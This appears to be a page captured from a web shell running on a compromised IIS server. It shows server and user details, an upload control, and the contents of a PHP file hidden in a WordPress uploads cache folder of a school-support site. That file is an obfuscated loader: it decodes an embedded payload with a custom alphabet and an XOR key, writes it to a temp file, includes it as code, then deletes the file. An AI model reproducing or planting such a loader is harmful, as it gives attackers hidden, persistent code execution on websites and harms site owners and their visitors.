HEX
Server: Microsoft-IIS/10.0
System: Windows NT H2838467 10.0 build 14393 (Windows Server 2016) AMD64
User: IWPD_8(ghana) (0)
PHP: 8.3.30
Disabled: NONE
$ pwd: C:/Inetpub/vhosts/ghanaschoolsupport.com/httpdocs/wp-content/uploads/2024/.cache/modules/
Upload Files
File: C:/Inetpub/vhosts/ghanaschoolsupport.com/httpdocs/wp-content/uploads/2024/.cache/modules/mouse.php
<?php
$encrypted = 'GEoBAAAAAQ9KX0c6DhxDLgoQGgVKHg';
if (!function_exists('caracal')) {
    function caracal($data, $key) {
        $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_';
        $bin = '';
        for ($i = 0; $i < strlen($data); $i++) {
            $index = strpos($alphabet, $data[$i]);
            $bin .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT);
        }

        $bytes = '';
        for ($i = 0; $i < strlen($bin); $i += 8) {
            $chunk = substr($bin, $i, 8);
            if (strlen($chunk) < 8) break; // если меньше 8 бит — игнорируем
            $bytes .= chr(bindec($chunk));
        }

        $res = '';
        $klen = strlen($key);
        for ($i = 0; $i < strlen($bytes); $i++) {
            $res .= $bytes[$i] ^ $key[$i % $klen];
        }
        return $res;
    }
}  

file_put_contents($tmp = tempnam(sys_get_temp_dir(), 'shf_'), caracal($encrypted, 'cheetah'));
include $tmp;
unlink($tmp);

?>
@ Telegram